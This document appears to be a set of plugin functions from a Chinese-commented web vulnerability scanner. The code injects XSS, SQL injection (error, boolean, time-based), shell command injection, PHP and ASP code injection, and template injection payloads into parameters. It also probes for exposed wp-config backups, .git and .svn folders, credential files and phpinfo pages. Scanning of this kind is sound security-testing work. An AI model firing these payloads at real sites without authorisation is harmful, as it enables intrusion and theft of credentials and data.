def audit(self): method = self.requests.command # 请求方式 GET or POST headers = self.requests.get_headers() # 请求头 dict类型 url = self.build_url() # 请求完整URL resp_data = self.response.get_body_data() # 返回数据 byte类型 resp_str = self.response.get_body_str() # 返回数据 str类型 自动解码 resp_headers = self.response.get_headers() # 返回头 dict类型 p = self.requests.urlparse params = self.requests.params netloc = self.requests.netloc combine = '^\S+\(\{.*\}\)' if re.match(combine, resp_str, re.I | re.S): # 判断是否为jsonp if "Referer" in headers: headers["Referer"] = "https://www.baidu.com/q=" + url if method == 'GET': r = requests.get(url, headers=headers) if GetRatio(resp_str, r.text) >= 0.8: out.success(url, self.name) elif re.match(JSON_RECOGNITION_REGEX, resp_str, re.I | re.S) and 'callback' not in url: # 不是jsonp,是json if "Referer" in headers: headers["Referer"] = "https://www.baidu.com/q=" + url params["callback"] = random_str(2) if method == 'GET': r = requests.get(netloc, params=params, headers=headers) if params["callback"] + "({" in r.text: out.success(r.url, self.name)
def audit(self): method = self.requests.command # 请求方式 GET or POST headers = self.requests.get_headers() # 请求头 dict类型 url = self.build_url() # 请求完整URL resp_data = self.response.get_body_data() # 返回数据 byte类型 resp_str = self.response.get_body_str() # 返回数据 str类型 自动解码 resp_headers = self.response.get_headers() # 返回头 dict类型 p = self.requests.urlparse params = self.requests.params netloc = self.requests.netloc domain = "{}://{}/".format(p.scheme, p.netloc) if "/wp-content/themes/" not in resp_str: return url_lst = [ '/wp-config.php.inc', '/wp-config.inc', '/wp-config.bak', '/wp-config.php~', '/.wp-config.php.swp', '/wp-config.php.bak' ] for payload in url_lst: test_url = domain.rstrip('/') + payload r = requests.get(test_url, headers=headers) if r.status_code == 200 and '<?php' in r.text: out.success(test_url, self.name)
def audit(self): method = self.requests.command # 请求方式 GET or POST headers = self.requests.get_headers() # 请求头 dict类型 url = self.build_url() # 请求完整URL resp_data = self.response.get_body_data() # 返回数据 byte类型 resp_str = self.response.get_body_str() # 返回数据 str类型 自动解码 resp_headers = self.response.get_headers() # 返回头 dict类型 p = self.requests.urlparse params = self.requests.params netloc = self.requests.netloc if p.query == '': return exi = os.path.splitext(p.path)[1] if exi not in acceptedExt: return if "Warning" in resp_str and "array given" in resp_str: out.success(url, self.name) for k, v in params.items(): if k.lower() in ignoreParams: continue data = copy.deepcopy(params) del data[k] data[k + "[]"] = v try: _ = prepare_url(netloc, params=data) r = requests.get(_, headers=headers) if "Warning" in r.text and "array given" in r.text: out.success(_, self.name) except: pass
def audit(self): method = self.requests.command # 请求方式 GET or POST headers = self.requests.get_headers() # 请求头 dict类型 url = self.build_url() # 请求完整URL post_hint = self.requests.post_hint post_data = self.requests.post_data resp_data = self.response.get_body_data() # 返回数据 byte类型 resp_str = self.response.get_body_str() # 返回数据 str类型 自动解码 resp_headers = self.response.get_headers() # 返回头 dict类型 p = self.requests.urlparse params = self.requests.params netloc = self.requests.netloc if method == 'POST': if post_hint == POST_HINT.NORMAL: for k, v in post_data.items(): if k.lower() in ignoreParams: continue rndStr = 9000 + random.randint(1, 999) payload = "<img/src=xyz OnErRor=alert(" + str( rndStr) + ")>" data = copy.deepcopy(post_data) data[k] = v + payload r = requests.post(url, headers=headers, data=data) html = r.text if payload in html: out.success(url, self.name, payload="{}={}".format(k, data[k]), data=str(data), raw=r.raw)
def audit(self): method = self.requests.command # 请求方式 GET or POST headers = self.requests.get_headers() # 请求头 dict类型 url = self.build_url() # 请求完整URL data = self.requests.get_body_data().decode() resp_data = self.response.get_body_data() # 返回数据 byte类型 resp_str = self.response.get_body_str() # 返回数据 str类型 自动解码 resp_headers = self.response.get_headers() # 返回头 dict类型 p = self.requests.urlparse params = self.requests.params netloc = self.requests.netloc combine = '^\S+\(\{.*\}\)' if re.match(combine, resp_str, re.I | re.S): if "Referer" in headers: del headers["Referer"] if method == 'GET': r = requests.get(url, headers=headers) if GetRatio(resp_str, r.text) >= 0.8: out.success(url, self.name) elif method == 'POST': r = requests.post(url, headers=headers, data=data) if GetRatio(resp_str, r.text) >= 0.8: out.success(url, self.name, payload=str(data))
def audit(self): method = self.requests.command # 请求方式 GET or POST headers = self.requests.get_headers() # 请求头 dict类型 url = self.build_url() # 请求完整URL resp_data = self.response.get_body_data() # 返回数据 byte类型 resp_str = self.response.get_body_str() # 返回数据 str类型 自动解码 resp_headers = self.response.get_headers() # 返回头 dict类型 p = self.requests.urlparse params = self.requests.params netloc = self.requests.netloc domain = "{}://{}/".format(p.scheme, p.netloc) + random_str(6) + ".jsp" re_list = { "ASPNETPathDisclosure": "<title>Invalid\sfile\sname\sfor\smonitoring:\s'([^']*)'\.\sFile\snames\sfor\smonitoring\smust\shave\sabsolute\spaths\,\sand\sno\swildcards\.<\/title>", "Struts2DevMod": "You are seeing this page because development mode is enabled. Development mode, or devMode, enables extra", "Django DEBUG MODEL": "You're seeing this error because you have <code>DEBUG = True<\/code> in", "RailsDevMode": "<title>Action Controller: Exception caught<\/title>", "RequiredParameter": "Required\s\w+\sparameter\s'([^']+?)'\sis\snot\spresent" } r = requests.get(domain, headers=headers) for k, v in re_list.items(): if re.search(v, r.text, re.S | re.I): out.success(domain, self.name, name=k) break
def audit(self): method = self.requests.command # 请求方式 GET or POST headers = self.requests.get_headers() # 请求头 dict类型 url = self.build_url() # 请求完整URL data = self.requests.get_body_data().decode() # POST 数据 resp_data = self.response.get_body_data() # 返回数据 byte类型 resp_str = self.response.get_body_str() # 返回数据 str类型 自动解码 resp_headers = self.response.get_headers() # 返回头 dict类型 path1 = get_parent_paths(url) urls = set(path1) for link in get_links(resp_str, url, True): path1 = get_parent_paths(link) urls |= set(path1) flag_list = [ "directory listing for", "<title>directory", "<head><title>index of", '<table summary="directory listing"', 'last modified</a>', ] for p in urls: if not Share.in_url(p): Share.add_url(p) try: r = requests.get(p, headers=headers) for i in flag_list: if i in r.text.lower(): out.success(p, self.name) break except Exception as e: pass
def audit(self): method = self.requests.command # 请求方式 GET or POST headers = self.requests.get_headers() # 请求头 dict类型 url = self.build_url() # 请求完整URL resp_data = self.response.get_body_data() # 返回数据 byte类型 resp_str = self.response.get_body_str() # 返回数据 str类型 自动解码 resp_headers = self.response.get_headers() # 返回头 dict类型 p = self.requests.urlparse params = self.requests.params netloc = self.requests.netloc payloads = self.generate() for payload in payloads: test_url = url.rstrip('/') + payload["path"] r = requests.get(test_url, headers=headers) if r.status_code != 200: continue if payload["tag"]: if payload["tag"] not in r.text: continue if payload["content-type"]: if payload['content-type'] not in r.headers.get( 'Content-Type', ''): continue if payload["content-type_no"]: if payload["content-type_no"] in r.headers.get( 'Content-Type', ''): continue out.success(test_url, self.name)
def audit(self): method = self.requests.command # 请求方式 GET or POST headers = self.requests.get_headers() # 请求头 dict类型 url = self.build_url() # 请求完整URL resp_data = self.response.get_body_data() # 返回数据 byte类型 resp_str = self.response.get_body_str() # 返回数据 str类型 自动解码 resp_headers = self.response.get_headers() # 返回头 dict类型 p = self.requests.urlparse params = self.requests.params netloc = self.requests.netloc variants = [ "/sftp-config.json", "/recentservers.xml" ] for f in variants: _ = url.rstrip('/') + f try: r = requests.get(_, headers=headers) if re.search(r'("type":[\s\S]*?"host":[\s\S]*?"user":[\s\S]*?"password":[\s\S]*")', r.text, re.I | re.S | re.M): out.success(_, self.name) elif re.search(r'(<Pass>[\s\S]*?<\/Pass>)', r.text, re.I): out.success(_, self.name) except Exception as e: pass
def audit(self): method = self.requests.command # 请求方式 GET or POST headers = self.requests.get_headers() # 请求头 dict类型 url = self.build_url() # 请求完整URL resp_data = self.response.get_body_data() # 返回数据 byte类型 resp_str = self.response.get_body_str() # 返回数据 str类型 自动解码 resp_headers = self.response.get_headers() # 返回头 dict类型 p = self.requests.urlparse params = self.requests.params netloc = self.requests.netloc variants = [ "phpinfo.php", "pi.php", "php.php", "i.php", "test.php", "temp.php", "info.php", ] for phpinfo in variants: testURL = url.strip('/') + "/" + phpinfo r = requests.get(testURL, headers=headers) if "<title>phpinfo()</title>" in r.text: info = get_phpinfo(r.text) out.success(testURL, self.name, info=info)
def audit(self): method = self.requests.command # 请求方式 GET or POST headers = self.requests.get_headers() # 请求头 dict类型 url = self.build_url() # 请求完整URL resp_data = self.response.get_body_data() # 返回数据 byte类型 resp_str = self.response.get_body_str() # 返回数据 str类型 自动解码 resp_headers = self.response.get_headers() # 返回头 dict类型 p = self.requests.urlparse params = self.requests.params netloc = self.requests.netloc flag = { "/.svn/all-wcprops": "svn:wc:ra_dav:version-url", "/.git/config": 'repositoryformatversion[\s\S]*', "/.bzr/README": 'This\sis\sa\sBazaar[\s\S]', '/CVS/Root': ':pserver:[\s\S]*?:[\s\S]*', '/.hg/requires': '^revlogv1.*' } for f in flag.keys(): _ = url.rstrip('/') + f try: r = requests.get(_, headers=headers) if re.search(flag[f], r.text, re.I | re.S | re.M): out.success(_, self.name) except Exception as e: pass
def _javascript_redirect(self, response: requests.Response): """ Test for JavaScript redirects, these are some common redirects: // These also work without the `window.` at the beginning window.location = "http://www.w3af.org/"; window.location.href = "http://www.w3af.org/"; window.location.replace("http://www.w3af.org"); window.location.assign('http://www.w3af.org'); self.location = 'http://www.w3af.org'; top.location = 'http://www.w3af.org'; // jQuery $(location).attr('href', 'http://www.w3af.org'); $(window).attr('location', 'http://www.w3af.org'); $(location).prop('href', 'http://www.w3af.org'); // Only for old IE window.navigate('http://www.w3af.org'); """ for statement in self._extract_script_code(response): if self.test_domain not in statement: continue out.success(self.uri, self.name, msg="当前JavaScript脚本发现被注入url,在 {}".format(statement)) return False
def audit(self): method = self.requests.command # 请求方式 GET or POST headers = self.requests.get_headers() # 请求头 dict类型 url = self.build_url() # 请求完整URL resp_data = self.response.get_body_data() # 返回数据 byte类型 resp_str = self.response.get_body_str() # 返回数据 str类型 自动解码 resp_headers = self.response.get_headers() # 返回头 dict类型 p = self.requests.urlparse params = self.requests.params netloc = self.requests.netloc domain = "{}://{}/".format(p.scheme, p.netloc) payloads = parse_tld(domain, fix_protocol=True, fail_silently=True) if not payloads: return for payload in payloads: for i in ['.rar', '.zip']: test_url = domain + payload + i r = requests.get(test_url, headers=headers, allow_redirects=False, stream=True) content = r.raw2.read(10) if r.status_code == 200 and self._check(content): rarsize = int(r.headers.get('Content-Length')) // 1024 // 1024 out.success(test_url, self.name, size="{}M".format(rarsize))
def audit(self): method = self.requests.command # 请求方式 GET or POST headers = self.requests.get_headers() # 请求头 dict类型 url = self.build_url() # 请求完整URL resp_data = self.response.get_body_data() # 返回数据 byte类型 resp_str = self.response.get_body_str() # 返回数据 str类型 自动解码 resp_headers = self.response.get_headers() # 返回头 dict类型 p = self.requests.urlparse params = self.requests.params netloc = self.requests.netloc combine = '^\S+\(\{.*\}\)' domain = "{}://{}".format(p.scheme, p.netloc) + random_str( 2, string.ascii_lowercase + string.digits) + p.netloc + "/" if re.match(combine, resp_str, re.I | re.S): # 判断是否为jsonp headers["Referer"] = domain if method == 'GET': r = requests.get(url, headers=headers) if GetRatio(resp_str, r.text) >= 0.8: out.success(url, self.name, raw=r.raw) elif re.match(JSON_RECOGNITION_REGEX, resp_str, re.I | re.S) and 'callback' not in url: # 不是jsonp,是json headers["Referer"] = domain params["callback"] = random_str(2) if method == 'GET': r = requests.get(netloc, params=params, headers=headers) if params["callback"] + "({" in r.text: out.success(r.url, self.name, raw=r.raw)
def audit(self): method = self.requests.command # 请求方式 GET or POST headers = self.requests.get_headers() # 请求头 dict类型 url = self.build_url() # 请求完整URL data = self.requests.get_body_data().decode(errors='ignore') resp_data = self.response.get_body_data() # 返回数据 byte类型 resp_str = self.response.get_body_str() # 返回数据 str类型 自动解码 resp_headers = self.response.get_headers() # 返回头 dict类型 p = self.requests.urlparse params = self.requests.params netloc = self.requests.netloc exi = os.path.splitext(p.path)[1] if exi not in acceptedExt: return sensitive_params = [ 'mail', 'user', 'name', 'ip', 'pass', 'add', 'phone' ] if "access-control-allow-origin" in resp_headers and resp_headers[ "access-control-allow-origin"] == "*": if "access-control-allow-credentials" in resp_headers and resp_headers[ "access-control-allow-credentials"].lower() == 'true': out.success(url, self.name, payload=str(data), method=method) else: for i in sensitive_params: if i in resp_str: out.success(url, self.name, sensitive=i, method=method, payload=str(data)) break
def audit(self): method = self.requests.command # 请求方式 GET or POST headers = self.requests.get_headers() # 请求头 dict类型 url = self.build_url() # 请求完整URL data = self.requests.get_body_data().decode() # POST 数据 resp_data = self.response.get_body_data() # 返回数据 byte类型 resp_str = self.response.get_body_str() # 返回数据 str类型 自动解码 resp_headers = self.response.get_headers() # 返回头 dict类型 path1 = get_parent_paths(url) urls = set(path1) for link in get_links(resp_str, url, True): path1 = get_parent_paths(link) urls |= set(path1) flag = { "/.svn/all-wcprops": "svn:wc:ra_dav:version-url", "/.git/config": 'repositoryformatversion' } for p in urls: for f in flag.keys(): _ = p.rstrip('/') + f if not Share.in_url(_): Share.add_url(_) try: r = requests.get(_, headers=headers) # out.log(_) if flag[f] in r.text: out.success(_, self.name) except Exception as e: pass
def audit(self): method = self.requests.command # 请求方式 GET or POST headers = self.requests.get_headers() # 请求头 dict类型 url = self.build_url() # 请求完整URL data = self.requests.get_body_data().decode() # POST 数据 resp_data = self.response.get_body_data() # 返回数据 byte类型 resp_str = self.response.get_body_str() # 返回数据 str类型 自动解码 resp_headers = self.response.get_headers() # 返回头 dict类型 if method == 'GET': # 从源码中获取更多链接 links = [url] for link in set(links): # 只接收指定类型的SQL注入 p = urlparse(link) if p.query == '': continue exi = os.path.splitext(p.path)[1] if exi not in acceptedExt: continue params = dict() for i in p.query.split("&"): try: key, value = i.split("=") params[key] = value except ValueError: pass netloc = "{}://{}{}".format(p.scheme, p.netloc, p.path) for k, v in params.items(): if k.lower() in ignoreParams: continue if not re.search('^-?\d+(\.\d+)?$', v): continue data = copy.deepcopy(params) # 判断条件: # 1. -randint !== origin # 2. +randint-randint == origin payload1 = "{0}+{1}".format(v, random.randint(10, 100)) data[k] = payload1 url1 = prepare_url(netloc, params=data) if Share.in_url(url1): continue Share.add_url(url1) r = requests.get(url1, headers=headers) html1 = r.text if fuzzy_equal(resp_str, html1, 0.97): continue payload2 = "{0}+{1}-{1}".format(v, random.randint(10, 100)) data[k] = payload2 r2 = requests.get(netloc, params=data, headers=headers) html2 = r2.text if fuzzy_equal(resp_str, html2, 0.8): msg = " {k}:{v} !== {k}:{v1} and {k}:{v} === {k}:{v2}".format( k=k, v=v, v1=payload1, v2=payload2) # out.log(msg) out.success(link, self.name, payload=k, condition=msg) break
def audit(self): method = self.requests.command # 请求方式 GET or POST headers = self.requests.get_headers() # 请求头 dict类型 url = self.build_url() # 请求完整URL resp_data = self.response.get_body_data() # 返回数据 byte类型 resp_str = self.response.get_body_str() # 返回数据 str类型 自动解码 resp_headers = self.response.get_headers() # 返回头 dict类型 p = self.requests.urlparse params = self.requests.params netloc = self.requests.netloc combine = '^\S+\(\{.*?\}\)' domain = "{}://{}".format(p.scheme, p.netloc) + random_str( 4, string.ascii_lowercase + string.digits) + ".com/" sensitive_params = [ 'mail', 'user', 'name', 'ip', 'pass', 'add', 'phone' ] if re.match(combine, resp_str, re.I | re.S): # 判断是否为jsonp headers["Referer"] = domain if method == 'GET': r = requests.get(url, headers=headers) if GetRatio(resp_str, r.text) >= 0.8: for i in sensitive_params: if i in r.text.lower(): res = { "Referer": domain, "keyword": i, "Content-Type": r.headers.get("Content-Type", "") } response = self.jsonp_load(r.text) if response: res["response"] = response if len(response) > 500: res["response"] = "数据太多,自行访问" out.success(url, self.name, **res) elif re.match(JSON_RECOGNITION_REGEX, resp_str, re.I | re.S) and 'callback' not in url: # 不是jsonp,是json headers["Referer"] = domain params["callback"] = random_str(2) if method == 'GET': r = requests.get(netloc, params=params, headers=headers) if r.text.startswith(params["callback"] + "({"): res = { "Referer": domain, "Content-Type": r.headers.get("Content-Type", ""), "callback": params["callback"], } response = self.jsonp_load(r.text) if response: res["response"] = response if len(response) > 500: res["response"] = "数据太多,自行访问" out.success(r.url, self.name, **res)
def audit(self): method = self.requests.command # 请求方式 GET or POST headers = self.requests.get_headers() # 请求头 dict类型 url = self.build_url() # 请求完整URL resp_data = self.response.get_body_data() # 返回数据 byte类型 resp_str = self.response.get_body_str() # 返回数据 str类型 自动解码 resp_headers = self.response.get_headers() # 返回头 dict类型 p = self.requests.urlparse params = self.requests.params netloc = self.requests.netloc if method == 'GET': # 从源码中获取更多链接 if p.query == '': return exi = os.path.splitext(p.path)[1] if exi not in acceptedExt: return sql_flag = [ "/**/and'{0}'='{1}'", "'and'{0}'='{1}", '"and"{0}"="{1}', ] for k, v in params.items(): if k.lower() in ignoreParams: continue data = copy.deepcopy(params) for flag in sql_flag: # true page rand_str = random_str(2) payload1 = v + flag.format(rand_str, rand_str) data[k] = payload1 url1 = prepare_url(netloc, params=data) r = requests.get(url1, headers=headers) html1 = r.text radio = GetRatio(resp_str, html1) if radio < 0.88: continue # false page payload2 = v + flag.format(random_str(2), random_str(2)) data[k] = payload2 r2 = requests.get(netloc, params=data, headers=headers) html2 = r2.text radio = GetRatio(resp_str, html2) if radio < 0.78: msg = "{k}:{v} === {k}:{v1} and {k}:{v} !== {k}:{v2}".format( k=k, v=v, v1=payload1, v2=payload2) # out.log(msg) out.success(url, self.name, payload=k, condition=msg, raw=[r.raw, r2.raw]) break
def audit(self): method = self.requests.command # 请求方式 GET or POST headers = self.requests.get_headers() # 请求头 dict类型 url = self.build_url() # 请求完整URL resp_data = self.response.get_body_data() # 返回数据 byte类型 resp_str = self.response.get_body_str() # 返回数据 str类型 自动解码 resp_headers = self.response.get_headers() # 返回头 dict类型 post_hint = self.requests.post_hint post_data = self.requests.post_data p = self.requests.urlparse params = self.requests.params netloc = self.requests.netloc if method == 'POST': if post_hint == POST_HINT.NORMAL: sql_flag = [ "/**/and'{0}'='{1}'", "'and'{0}'='{1}", '"and"{0}"="{1}', ] for k, v in post_data.items(): if k.lower() in ignoreParams: continue data = copy.deepcopy(post_data) for flag in sql_flag: # true page rand_str = random_str(2) payload1 = v + flag.format(rand_str, rand_str) data[k] = payload1 r = requests.post(url, data=data, headers=headers) html1 = r.text radio = GetRatio(resp_str, html1) if radio < 0.88: continue # false page payload2 = v + flag.format(random_str(2), random_str(2)) data[k] = payload2 r2 = requests.post(url, data=data, headers=headers) html2 = r2.text radio2 = GetRatio(resp_str, html2) if radio < 0.78: condition = [ '{k}:{v} 与原页面 {k}:{v1} 的相似度{radio} 页面大小:{size1}'.format(k=k, v=payload1, v1=v, radio=radio, size1=len(html1)), '{k}:{v} 与原页面 {k}:{v1} 的相似度{radio} 页面大小:{size2}'.format(k=k, v=payload2, v1=v, radio=radio2, size2=len(html2)) ] # out.log(msg) out.success(url, self.name, payload=k, condition=condition, data=str(data), raw=[r.raw, r2.raw]) break
def audit(self): method = self.requests.command # 请求方式 GET or POST headers = self.requests.get_headers() # 请求头 dict类型 url = self.build_url() # 请求完整URL resp_data = self.response.get_body_data() # 返回数据 byte类型 resp_str = self.response.get_body_str() # 返回数据 str类型 自动解码 resp_headers = self.response.get_headers() # 返回头 dict类型 p = self.requests.urlparse params = self.requests.params netloc = self.requests.netloc # cookie sql_flag = '鎈\'"\(' if headers and "cookie" in headers: cookies = paramToDict(headers["cookie"], place=PLACE.COOKIE) del headers["cookie"] if cookies: for k, v in cookies.items(): cookie = copy.deepcopy(cookies) cookie[k] = v + sql_flag r = requests.get(url, headers, cookies=urlencode(cookie)) for sql_regex, dbms_type in Get_sql_errors(): match = sql_regex.search(r.text) if match: out.success(url, self.name, payload="cookie: {}={}".format( k, cookie[k]), dbms_type=dbms_type, raw=r.raw) break if method == 'GET': if p.query == '': return exi = os.path.splitext(p.path)[1] if exi not in acceptedExt: return for k, v in params.items(): if k.lower() in ignoreParams: continue data = copy.deepcopy(params) data[k] = v + sql_flag url1 = prepare_url(netloc, params=data) r = requests.get(url1, headers=headers) html = r.text for sql_regex, dbms_type in Get_sql_errors(): match = sql_regex.search(html) if match: out.success(url, self.name, payload="{}={}".format(k, data[k]), dbms_type=dbms_type, raw=r.raw) break
def audit(self): method = self.requests.command # 请求方式 GET or POST headers = self.requests.get_headers() # 请求头 dict类型 url = self.build_url() # 请求完整URL resp_data = self.response.get_body_data() # 返回数据 byte类型 resp_str = self.response.get_body_str() # 返回数据 str类型 自动解码 resp_headers = self.response.get_headers() # 返回头 dict类型 p = self.requests.urlparse params = self.requests.params netloc = self.requests.netloc if method == 'GET': if p.query == '': return exi = os.path.splitext(p.path)[1] if exi not in acceptedExt: return sql_flag = [ "'and(select+sleep({time})union/**/select+1)='", '"and(select+sleep({time})union/**/select+1)="', '/**/and(select+sleep({time})union/**/select+1)' ] for k, v in params.items(): if k.lower() in ignoreParams: continue data = copy.deepcopy(params) for flag in sql_flag: # first request payload1 = flag.format(time=0) data[k] = v + payload1 url1 = prepare_url(netloc, params=data) _ = time.time() r = requests.get(url1, headers=headers) html1 = r.text elapsed = time.time() - _ # second request payload2 = flag.format(time=2) data[k] = v + payload2 _ = time.time() r2 = requests.get(netloc, params=data, headers=headers) html2 = r2.text elapsed2 = time.time() - _ if elapsed2 - elapsed > 1.5: msg = " {k}:{v1} 耗时 {time1}s; {k}:{v2} 耗时 {time2}s".format( k=k, v1=payload1, v2=payload2, time1=elapsed, time2=elapsed2) # out.log(msg) out.success(url, self.name, payload=k, condition=msg) break
def audit(self): method = self.requests.command # 请求方式 GET or POST headers = self.requests.get_headers() # 请求头 dict类型 url = self.build_url() # 请求完整URL resp_data = self.response.get_body_data() # 返回数据 byte类型 resp_str = self.response.get_body_str() # 返回数据 str类型 自动解码 resp_headers = self.response.get_headers() # 返回头 dict类型 post_hint = self.requests.post_hint post_data = self.requests.post_data p = self.requests.urlparse params = self.requests.params netloc = self.requests.netloc if method == 'POST': if post_hint == POST_HINT.NORMAL: randint = random.randint(1000, 9000) url_flag = { "set|set&set": [ 'Path=[\s\S]*?PWD=', 'Path=[\s\S]*?PATHEXT=', 'Path=[\s\S]*?SHELL=', 'Path\x3d[\s\S]*?PWD\x3d', 'Path\x3d[\s\S]*?PATHEXT\x3d', 'Path\x3d[\s\S]*?SHELL\x3d', 'SERVER_SIGNATURE=[\s\S]*?SERVER_SOFTWARE=', 'SERVER_SIGNATURE\x3d[\s\S]*?SERVER_SOFTWARE\x3d', 'Non-authoritative\sanswer:\s+Name:\s*', 'Server:\s*.*?\nAddress:\s*' ], "echo `echo 6162983|base64`6162983".format(randint): ["NjE2Mjk4Mwo=6162983"] } for k, v in post_data.items(): if k.lower() in ignoreParams: continue data = copy.deepcopy(post_data) for spli in ['', ';']: for flag, re_list in url_flag.items(): if spli == "": data[k] = flag else: data[k] = v + spli + flag r = requests.post(url, data=data, headers=headers) html1 = r.text for rule in re_list: if re.search(rule, html1, re.I | re.S | re.M): out.success(url, self.name, payload="{}:{}".format( k, data[k]), method=method, data=str(data), raw=r.raw) break
def audit(self): method = self.requests.command # 请求方式 GET or POST headers = self.requests.get_headers() # 请求头 dict类型 url = self.build_url() # 请求完整URL resp_data = self.response.get_body_data() # 返回数据 byte类型 resp_str = self.response.get_body_str() # 返回数据 str类型 自动解码 resp_headers = self.response.get_headers() # 返回头 dict类型 post_hint = self.requests.post_hint post_data = self.requests.post_data p = self.requests.urlparse params = self.requests.params netloc = self.requests.netloc if method == 'POST': regx = 'Parse error: syntax error,.*?\sin\s' randint = random.randint(1, 256) verify_result = md5(str(randint).encode()) payloads = [ "print(md5({}));", ";print(md5({}));", "';print(md5({}));$a='", "\";print(md5({}));$a=\"", "${{@print(md5({}))}}", "${{@print(md5({}))}}\\" ] if post_hint == POST_HINT.NORMAL: for k, v in post_data.items(): if k.lower() in ignoreParams: continue data = copy.deepcopy(post_data) for payload in payloads: if payload[0] == "p": data[k] = payload.format(randint) else: data[k] = v + payload.format(randint) r = requests.post(url, data=data, headers=headers) html1 = r.text if verify_result in html1: out.success(url, self.name, payload="{}:{}".format(k, data[k]), method=method, data=str(data), raw=r.raw) break if re.search(regx, html1, re.I | re.S | re.M): out.success(url, self.name, payload="{}:{}".format(k, data[k]), method=method, data=str(data), raw=r.raw) break
def audit(self): method = self.requests.command # 请求方式 GET or POST headers = self.requests.get_headers() # 请求头 dict类型 url = self.build_url() # 请求完整URL resp_data = self.response.get_body_data() # 返回数据 byte类型 resp_str = self.response.get_body_str() # 返回数据 str类型 自动解码 resp_headers = self.response.get_headers() # 返回头 dict类型 p = self.requests.urlparse params = self.requests.params netloc = self.requests.netloc if method == 'GET': if p.query == '': return exi = os.path.splitext(p.path)[1] if exi not in acceptedExt: return regx = 'Parse error: syntax error,.*?\sin\s' randint = random.randint(1, 256) verify_result = md5(str(randint).encode()) payloads = [ "print(md5({}));", ";print(md5({}));", "';print(md5({}));$a='", "\";print(md5({}));$a=\"", "${{@print(md5({}))}}", "${{@print(md5({}))}}\\" ] for k, v in params.items(): if k.lower() in ignoreParams: continue data = copy.deepcopy(params) for payload in payloads: if payload[0] == "p": data[k] = payload.format(randint) else: data[k] = v + payload.format(randint) url1 = prepare_url(netloc, params=data) r = requests.get(url1, headers=headers) html1 = r.text if verify_result in html1: out.success(url, self.name, payload="{}:{}".format(k, data[k])) break if re.search(regx, html1, re.I | re.S | re.M): out.success(url, self.name, payload="{}:{}".format(k, data[k])) break
def audit(self): method = self.requests.command # 请求方式 GET or POST headers = self.requests.get_headers() # 请求头 dict类型 url = self.build_url() # 请求完整URL resp_data = self.response.get_body_data() # 返回数据 byte类型 resp_str = self.response.get_body_str() # 返回数据 str类型 自动解码 resp_headers = self.response.get_headers() # 返回头 dict类型 p = self.requests.urlparse params = self.requests.params netloc = self.requests.netloc payloads = self.generate() success = [] for payload in payloads: test_url = url.rstrip('/') + payload["path"] r = requests.get(test_url, headers=headers, allow_redirects=False) if r.status_code != 200: continue if payload["tag"]: if payload["tag"] not in r.text: continue if payload["content-type"]: if payload['content-type'] not in r.headers.get( 'Content-Type', ''): continue if payload["content-type_no"]: if payload["content-type_no"] in r.headers.get( 'Content-Type', ''): continue success.append({"url": test_url, "len": len(r.text)}) if success: if len(success) < 10: for i in success: out.success(i["url"], self.name) else: result = {} for item in success: length = item.get("len", 0) if length not in result: result[length] = list() result[length].append(item["url"]) for k, v in result.items(): if len(v) > 5: continue else: for i in v: out.success(i, self.name)
def audit(self): method = self.requests.command # 请求方式 GET or POST headers = self.requests.get_headers() # 请求头 dict类型 url = self.build_url() # 请求完整URL data = self.requests.get_body_data().decode() # POST 数据 resp_data = self.response.get_body_data() # 返回数据 byte类型 resp_str = self.response.get_body_str() # 返回数据 str类型 自动解码 resp_headers = self.response.get_headers() # 返回头 dict类型 if method == 'GET': # 从源码中获取更多链接 links = get_links(resp_str, url, True) links.append(url) for link in set(links): # 只接收指定类型的SQL注入 p = urlparse(link) if p.query == '': continue exi = os.path.splitext(p.path)[1] if exi not in acceptedExt: continue params = dict() for i in p.query.split("&"): try: key, value = i.split("=") params[key] = value except ValueError: pass netloc = "{}://{}{}".format(p.scheme, p.netloc, p.path) sql_flag = '鎈\'"\(' for k, v in params.items(): if k.lower() in ignoreParams: continue data = copy.deepcopy(params) data[k] = v + sql_flag url1 = prepare_url(netloc, params=data) if Share.in_url(url1): continue Share.add_url(url1) r = requests.get(url1, headers=headers) html = r.text for sql_regex, dbms_type in Get_sql_errors(): match = sql_regex.search(html) if match: out.success(link, self.name, payload="{}={}".format(k, data[k])) break
def audit(self): method = self.requests.command # 请求方式 GET or POST headers = self.requests.get_headers() # 请求头 dict类型 url = self.build_url() # 请求完整URL resp_data = self.response.get_body_data() # 返回数据 byte类型 resp_str = self.response.get_body_str() # 返回数据 str类型 自动解码 resp_headers = self.response.get_headers() # 返回头 dict类型 p = self.requests.urlparse params = self.requests.params netloc = self.requests.netloc if method == 'GET': if p.query == '': return exi = os.path.splitext(p.path)[1] if exi not in acceptedExt: return for k, v in params.items(): if k.lower() in ignoreParams: continue data = copy.deepcopy(params) randint1 = random.randint(100, 900) randint2 = random.randint(100, 900) randstr = random_str(4) payloads = { "{ranstr}${{{int1}*{int2}}}{ranstr}".format(ranstr=randstr, int1=randint1, int2=randint2), "{ranstr}#{{{int1}*{int2}}}{ranstr}".format(ranstr=randstr, int1=randint1, int2=randint2) } flag = "{ranstr}.?{{?{int}}}?{ranstr}".format(ranstr=randstr, int=randint1 * randint2) for payload in payloads: data[k] = v + payload r = requests.get(netloc, params=data, headers=headers) if re.search(flag, r.text): out.success(url, self.name, payload="{}:{}".format(k, data[k], raw=r.raw))
def audit(self): method = self.requests.command # 请求方式 GET or POST headers = self.requests.get_headers() # 请求头 dict类型 url = self.build_url() # 请求完整URL resp_data = self.response.get_body_data() # 返回数据 byte类型 resp_str = self.response.get_body_str() # 返回数据 str类型 自动解码 resp_headers = self.response.get_headers() # 返回头 dict类型 p = self.requests.urlparse params = self.requests.params netloc = self.requests.netloc if method == 'GET': if p.query == '': return exi = os.path.splitext(p.path)[1] if exi not in acceptedExt: return randint1 = random.randint(10000, 90000) randint2 = random.randint(10000, 90000) randint3 = randint1 * randint2 payloads = [ 'response.write({}*{})'.format(randint1, randint2), '\'+response.write({}*{})+\''.format(randint1, randint2), '"response.write({}*{})+"'.format(randint1, randint2), ] for k, v in params.items(): if k.lower() in ignoreParams: continue data = copy.deepcopy(params) for payload in payloads: if payload[0] == "": data[k] = payload else: data[k] = v + payload url1 = prepare_url(netloc, params=data) r = requests.get(url1, headers=headers) html1 = r.text if str(randint3) in html1: out.success(url, self.name, payload="{}:{}".format(k, data[k]), raw=r.raw) break
